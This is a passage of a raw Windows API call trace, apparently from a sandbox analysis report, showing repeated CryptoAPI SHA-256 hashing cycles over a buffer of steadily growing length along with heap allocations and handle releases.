CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a260, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a260, pdwDataLen=0xcdfdc) returned 1 [0175.948] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.948] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0175.949] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0175.949] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.949] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0175.949] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.949] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6aa70 [0175.949] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6aa70, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6aa70, pdwDataLen=0xcdfdc) returned 1 [0175.949] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.949] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0175.949] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0175.950] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.950] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0175.950] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.950] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6aaa0 [0175.950] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6aaa0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6aaa0, pdwDataLen=0xcdfdc) returned 1 [0175.950] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.950] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0175.950] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0175.950] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.950] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0175.950] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.950] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a350 [0175.950] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6a350, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a350, pdwDataLen=0xcdfdc) returned 1 [0175.950] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.950] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0175.951] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338238d0) returned 1 [0175.951] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.951] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0175.951] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.951] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ab00 [0175.951] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6ab00, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6ab00, pdwDataLen=0xcdfdc) returned 1 [0175.951] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.951] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0175.951] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821dd0) returned 1 [0175.952] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.952] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0175.952] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.952] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a050 [0175.952] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a050, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a050, pdwDataLen=0xcdfdc) returned 1 [0175.952] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.952] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0175.952] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0175.952] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.952] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0175.952] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.952] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e69f60 [0175.952] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e69f60, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e69f60, pdwDataLen=0xcdfdc) returned 1 [0175.952] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.953] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0175.953] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0175.953] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.953] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0175.953] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.953] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a4a0 [0175.953] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a4a0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a4a0, pdwDataLen=0xcdfdc) returned 1 [0175.953] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.953] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0175.953] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0175.954] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.954] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0175.954] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.954] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a320 [0175.954] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a320, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a320, pdwDataLen=0xcdfdc) returned 1 [0175.954] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.954] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0175.954] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0175.954] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.954] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0175.954] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.954] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a110 [0175.954] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6a110, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a110, pdwDataLen=0xcdfdc) returned 1 [0175.955] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.955] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0175.955] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0175.955] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.955] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0175.955] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.955] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e69fc0 [0175.955] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e69fc0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e69fc0, pdwDataLen=0xcdfdc) returned 1 [0175.955] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.955] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0175.955] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0175.956] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.956] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0175.956] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.956] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a170 [0175.956] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a170, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a170, pdwDataLen=0xcdfdc) returned 1 [0175.956] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.956] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0175.956] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0175.957] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.957] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0175.957] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.957] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a290 [0175.957] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a290, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a290, pdwDataLen=0xcdfdc) returned 1 [0175.957] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.957] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0175.959] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0175.959] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.959] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0175.959] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.959] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a2c0 [0175.959] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a2c0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a2c0, pdwDataLen=0xcdfdc) returned 1 [0175.959] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.959] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0175.959] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0175.960] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.960] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0175.960] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.960] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a3e0 [0175.960] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6a3e0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a3e0, pdwDataLen=0xcdfdc) returned 1 [0175.960] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.960] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0175.960] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0175.961] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.961] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0175.961] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.961] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a4d0 [0175.961] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a4d0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a4d0, pdwDataLen=0xcdfdc) returned 1 [0175.961] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.961] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0175.961] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0175.961] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.961] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0175.962] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.962] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a620 [0175.962] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a620, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a620, pdwDataLen=0xcdfdc) returned 1 [0175.962] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.962] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0175.962] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0175.962] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.962] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0175.962] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.962] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b310 [0175.962] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6b310, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b310, pdwDataLen=0xcdfdc) returned 1 [0175.962] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.963] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0175.963] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0175.963] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.963] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0175.963] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.963] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b5b0 [0175.963] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6b5b0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b5b0, pdwDataLen=0xcdfdc) returned 1 [0175.963] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.963] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0175.963] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0175.964] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.964] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0175.964] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.964] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b100 [0175.964] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6b100, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b100, pdwDataLen=0xcdfdc) returned 1 [0175.964] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.964] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0175.964] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0175.964] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.964] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0175.964] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.964] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ac50 [0175.964] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6ac50, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6ac50, pdwDataLen=0xcdfdc) returned 1 [0175.965] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.965] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0175.965] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0175.965] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.965] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0175.965] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.965] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b3a0 [0175.965] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6b3a0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b3a0, pdwDataLen=0xcdfdc) returned 1 [0175.965] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.965] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0175.965] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0175.966] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.966] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0175.966] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.966] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b400 [0175.966] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6b400, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b400, pdwDataLen=0xcdfdc) returned 1 [0175.966] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.966] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0175.966] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0175.966] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.966] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0175.966] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.966] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b610 [0175.967] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6b610, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b610, pdwDataLen=0xcdfdc) returned 1 [0175.967] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.967] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0175.967] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338233d0) returned 1 [0175.967] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.967] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0175.967] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.967] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b190 [0175.967] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6b190, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b190, pdwDataLen=0xcdfdc) returned 1 [0175.967] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.967] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0175.967] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821fd0) returned 1 [0175.968] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 